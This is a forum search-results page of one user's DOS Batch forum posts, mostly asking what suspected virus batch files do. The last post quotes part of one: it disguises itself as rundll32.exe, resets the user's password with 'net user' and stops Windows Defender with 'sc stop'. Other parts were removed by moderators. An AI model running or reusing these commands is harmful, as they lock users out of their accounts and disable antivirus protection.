GOD DANGIT!
nooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooOOOOO
OHH GOD NOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO
Search found 7 matches
- 04 Jan 2013 13:56
- Forum: DOS Batch Forum
- Topic: What do this batch-file??? (another one) :(
- Replies: 3
- Views: 3279
- 04 Jan 2013 12:50
- Forum: DOS Batch Forum
- Topic: What do this batch-file??? (another one) :(
- Replies: 3
- Views: 3279
What do this batch-file??? (another one) :(
Hi Guys, after founding 32 viruses, i found a .bat file with this code (an virus?):
Mod Edit: Obfucscated code removed
can you say me, what is does and who can re-install it??? thanks very much
Mod Edit: Obfucscated code removed
can you say me, what is does and who can re-install it??? thanks very much
- 04 Jan 2013 06:36
- Forum: DOS Batch Forum
- Topic: Writing an exe via batch
- Replies: 13
- Views: 10108
Re: Writing an exe via batch
follow this steps: 1. write your .bat file 2. compile it 3. edit the .exe file (open in editor) 4. copy code 5. in the .bat code, who must write the code, type this: echo ##exampel## > exampel.exe echo ##exampel## >> exampel.exe echo ##exampel## >> exampel.exe ... only write one line of code in one ...
- 04 Jan 2013 06:23
- Forum: DOS Batch Forum
- Topic: How to jump to the root directory from current directory
- Replies: 11
- Views: 13053
Re: How to jump to the root directory from current directory
you can use the command CD..
example:
------------------------------
cd %username%\Downloads
start "downloaded file"
-----------------------------
example:
------------------------------
cd %username%\Downloads
start "downloaded file"
-----------------------------
- 04 Jan 2013 06:20
- Forum: DOS Batch Forum
- Topic: What do this Batch-File??
- Replies: 6
- Views: 4749
Re: What do this Batch-File??
oh man :/ dangit virus
- 03 Jan 2013 05:30
- Forum: DOS Batch Forum
- Topic: What do this Batch-File??
- Replies: 6
- Views: 4749
Re: What do this Batch-File??
Thanks for the quick answer.
Its importend to reinstall windows..?
(Sorry for my bad english :/)
Its importend to reinstall windows..?
(Sorry for my bad english :/)
- 03 Jan 2013 04:30
- Forum: DOS Batch Forum
- Topic: What do this Batch-File??
- Replies: 6
- Views: 4749
What do this Batch-File??
Hi Guys, my PC is in the moment very laggy, because i have an virus. So, after my research, i found a .bat file with this code: @echo off title rundll32.exe :run :: registry edits removed net user %username% NDS sc stop WinDefend sc stop Netzwerkmanager :start set rtr=%random% :: url removed :: %~dp...